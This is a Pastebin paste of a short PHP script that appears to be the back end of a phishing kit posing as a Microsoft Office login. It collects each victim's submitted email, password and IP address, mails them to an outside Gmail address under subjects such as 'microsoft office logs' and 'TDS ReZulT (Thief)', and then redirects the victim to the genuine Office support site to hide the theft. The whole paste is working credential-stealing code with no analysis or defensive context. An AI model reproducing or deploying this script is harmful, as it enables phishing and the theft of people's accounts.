Advertisement
Guest User

Untitled

a guest
Feb 19th, 2020
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. <?
  2.  
  3. $ip = getenv("REMOTE_ADDR");
  4. $message .= "--------------EDU---------------------\n";
  5. $message .= "Email: ".$_POST['UserName']."\n";
  6. $message .= "Password : ".$_POST['Password']."\n";
  7. $message .= "IP: ".$ip."\n";
  8. $message .= "---------------ALL EDU---------------------------\n";
  9.  
  10. $recipient = "futoalert@gmail.com";
  11. $do = "mail";
  12. $subject = "microsoft office logs";
  13. $headers = "From: Dialing<call@home.com>";
  14. $headers .= $_POST['eMailAdd']."\n";
  15. $headers .= "MIME-Version: 1.0\n";
  16. $do($er,$subject,$message,$headers);
  17. mail("$cc", "TDS ReZulT (Thief)", $message);
  18. if (mail($recipient,$subject,$message,$headers))
  19. {
  20. header("Location: https://support.office.com");
  21.  
  22. }
  23. else
  24. {
  25. echo "ERROR! Please go back and try again.";
  26. }
  27.  
  28. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement